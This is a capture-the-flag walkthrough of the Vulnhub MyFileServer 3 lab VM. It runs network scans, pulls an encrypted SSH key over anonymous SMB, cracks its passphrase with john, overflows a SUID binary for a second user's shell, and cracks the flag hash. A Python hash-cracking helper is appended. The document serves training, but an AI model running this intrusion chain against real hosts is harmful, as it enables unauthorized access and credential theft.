Vulnhub MyFileServer 3: Detailed Walkthrough
MyFileServer 3
Identifying the target host IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:aa:7e:0e 1 60 PCS Systemtechnik GmbH
192.168.56.104 08:00:27:14:64:a8 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host IP address is identified as 192.168.56.104.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-30 02:47 EDT
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00032s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 45644/tcp nlockmgr
| 100021 1,3,4 49617/udp nlockmgr
| 100021 1,3,4 53505/udp6 nlockmgr
| 100021 1,3,4 55155/tcp6 nlockmgr
| 100024 1 39158/udp6 status
| 100024 1 50305/tcp status
| 100024 1 57404/tcp6 status
| 100024 1 58589/udp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
1337/tcp open waste?
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:
|_ Why are you here ?!
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 root root 16 Feb 19 2020 pub [NSE: writeable]
20048/tcp open mountd 1-3 (RPC #100005)
45644/tcp open nlockmgr 1-4 (RPC #100021)
50305/tcp open status 1 (RPC #100024)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:14:64:A8 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m31s, median: 0s
| smb2-time:
| date: 2023-03-30T06:48:23
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-03-30T12:18:23+05:30
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.20 seconds
Getting a shell
SMB service
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ smbclient -L 192.168.56.104
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 19 00:53:12 2020
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020
todo N 162 Tue Feb 25 09:22:29 2020
id_rsa N 1766 Thu Mar 19 00:43:16 2020
note.txt N 128 Thu Mar 19 00:53:12 2020
19976192 blocks of size 1024. 18260504 blocks available
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\
smb: \> get note.txt
getting file \note.txt of size 128 as note.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> get id_rsa
getting file \id_rsa of size 1766 as id_rsa (17.1 KiloBytes/sec) (average 7.9 KiloBytes/sec)
smb: \> get todo
getting file \todo of size 162 as todo (1.5 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> get lastlog
getting file \lastlog of size 292292 as lastlog (2283.5 KiloBytes/sec) (average 615.5 KiloBytes/sec)
smb: \> quit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ cat todo
https://drive.google.com/uc?id=1JuQ4MIO9nfCUFYjP210V31EpsGAINKKc&export=download
https://drive.google.com/uc?id=19r5TYGhcM5qZOd9OTF-NwMryRAa1RteI&export=download
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ cat note.txt
I removed find command for security purpose, But don't want to delete 'getcap'.
I don't think 'getcap & capsh' known to anyone
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0111C403C183156C592743C68EA855BD
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ enum4linux 192.168.56.104
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\smbuser (Local User)
S-1-22-1-1001 Unix User\bla (Local User)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ ssh -i id_rsa smbuser@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ED25519) to the list of known hosts.
##############################################################################################
# InfoSec Warrior #
# --------- www.InfoSecWarrior.com ------------ #
# My File Server - 3 #
# Just a simple addition to the problem #
# Designed By :- CyberKnight #
# Twitter :- @CyberKnight00 #
##############################################################################################
Enter passphrase for key 'id_rsa':
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (id_rsa)
1g 0:00:00:00 DONE (2023-03-30 02:56) 3.333g/s 53.33p/s 53.33c/s 53.33C/s 123456..jessica
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ ssh -i id_rsa smbuser@192.168.56.104
##############################################################################################
# InfoSec Warrior #
# --------- www.InfoSecWarrior.com ------------ #
# My File Server - 3 #
# Just a simple addition to the problem #
# Designed By :- CyberKnight #
# Twitter :- @CyberKnight00 #
##############################################################################################
Enter passphrase for key 'id_rsa':
Last login: Thu Mar 19 10:15:35 2020 from 192.168.56.1
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$
Surprisingly, that already gives us a shell.
[smbuser@fileserver ~]$ /usr/bin/esclate
123456789012345678901234567
Why are you here ?!
[smbuser@fileserver ~]$ /usr/bin/esclate
123456789012345687901234567890123456
Segmentation fault
[smbuser@fileserver ~]$ /usr/bin/esclate
1234567890123456789012345678901234
sh-4.2$ id
uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)
sh-4.2$
/usr/bin/esclate has the SUID bit set, and its output changes with the length of the input (a message for a short input, a segmentation fault for a long one), which indicates a buffer overflow. With an input of 34 digits we get a shell as user bla.
sh-4.2$ cat user.txt
_____ _ _ ____ _____
| ___(_) | ___/ ___| ___ _ ____ _____ _ __ |___ /
| |_ | | |/ _ \___ \ / _ \ '__\ \ / / _ \ '__| _____ |_ \
| _| | | | __/___) | __/ | \ V / __/ | |_____| ___) |
|_| |_|_|\___|____/ \___|_| \_/ \___|_| |____/
Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f
you can crack this hash, because it is also my pasword
note: crack it, itiseasy
This gives us the user flag, and the author says the flag is also a password, so we crack it with John:
Cracking it with an online site yields the password itiseasy.
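As an added example (not part of the original walkthrough), this is the check a practitioner would run on the flag before reaching for an online cracker: a 32-hex string has the size of an unsalted MD5 digest, and a short dictionary pass confirms or refutes the author's claim that it is a password hash. The wordlist and the digests used in the code are constructed for the demo; a real run would stream the rockyou.txt wordlist used earlier on this page.

```python
import hashlib
import re
from typing import Iterable, Optional

# Digest length (in hex characters) -> likely unsalted algorithm.
# The user.txt flag above is 32 hex characters, i.e. MD5-sized.
LENGTH_TO_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}

# Constructed mini wordlist for the demo (not taken from the target).
CANDIDATES = ["123456", "password", "letmein", "itiseasy", "fileserver"]


def identify(digest: str) -> Optional[str]:
    """Guess the hash algorithm from the digest length; None if not plain hex."""
    d = digest.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", d):
        return None
    return LENGTH_TO_ALGO.get(len(d))


def crack(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word whose digest matches, or None if nothing matches."""
    algo = identify(digest)
    if algo is None:
        raise ValueError("digest is not a plain hex MD5/SHA-1/SHA-256 value")
    target = digest.strip().lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None


def load_wordlist(path: str) -> Iterable[str]:
    """Stream a wordlist such as /usr/share/wordlists/rockyou.txt line by line."""
    with open(path, encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\n")


if __name__ == "__main__":
    # Constructed digest: md5("password"); cracks to "password" with CANDIDATES.
    print(crack("5f4dcc3b5aa765d61d8327deb882cf99", CANDIDATES))
```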